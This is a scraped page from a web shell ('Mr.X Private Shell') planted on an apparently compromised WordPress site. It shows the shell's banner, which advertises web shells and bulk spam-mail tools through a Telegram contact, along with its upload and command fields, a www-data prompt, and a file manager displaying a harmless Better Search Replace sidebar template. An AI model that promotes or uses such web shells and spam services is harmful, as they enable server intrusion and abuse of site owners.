__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.159: ~ $
<?php
/**
 * Upgrade sidebar partial.
 *
 * @package Better_Search_Replace
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

if ( ! defined( 'BSR_PATH' ) ) {
	exit;
}

// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedVariableFound -- Template partial loaded in BSR admin context; variables are file scope, not WordPress globals.
$birds = plugin_dir_url( __FILE__ ) . '../assets/svg/mdb-birds.svg';
$upgrade_href = 'https://deliciousbrains.com/better-search-replace/upgrade/?utm_source=insideplugin&utm_medium=web&utm_content=sidebar&utm_campaign=bsr-to-migrate';
// phpcs:enable WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedVariableFound

?>
<div class="upgrade-sidebar">
	<img src="<?php echo esc_url( $birds ); ?>" alt="">
	<div class="content">
		<h3><?php esc_html_e( 'Upgrade', 'better-search-replace' ); ?></h3>
		<p><?php esc_html_e( 'Gain access to more database and migration features', 'better-search-replace' ); ?></p>

		<ul>
			<li>
				<p><?php esc_html_e( 'Preview database changes before they are saved', 'better-search-replace' ); ?></p>
			</li>
			<li>
				<p><?php esc_html_e( 'Use regular expressions for complex string replacements', 'better-search-replace' ); ?></p>
			</li>
			<li>
				<p><?php esc_html_e( 'Migrate full sites including themes, plugins, media, and database', 'better-search-replace' ); ?></p>
			</li>
			<li>
				<p><?php esc_html_e( 'Export and import WordPress databases', 'better-search-replace' ); ?></p>
			</li>
			<li>
				<p><?php esc_html_e( 'Email support', 'better-search-replace' ); ?></p>
			</li>
		</ul>

		<p class="upgrade-offer-text"><?php echo wp_kses_post( __( 'Get up to <span>50% off</span> your first year!', 'better-search-replace' ) ); ?></p>

		<div class="button-row">
			<a href="<?php echo esc_url( $upgrade_href ); ?>" class="button button-primary button-sm" target="_blank" rel="noopener noreferrer"><?php esc_html_e( 'Upgrade Now', 'better-search-replace' ); ?></a>
		</div>
	</div>
</div>

Filemanager

Name Type Size Permission Actions
bsr-dashboard.php File 4.07 KB 0644
bsr-help.php File 2.63 KB 0644
bsr-search-replace.php File 5.59 KB 0644
bsr-settings.php File 1.96 KB 0644
sidebar.php File 1.95 KB 0644
Filemanager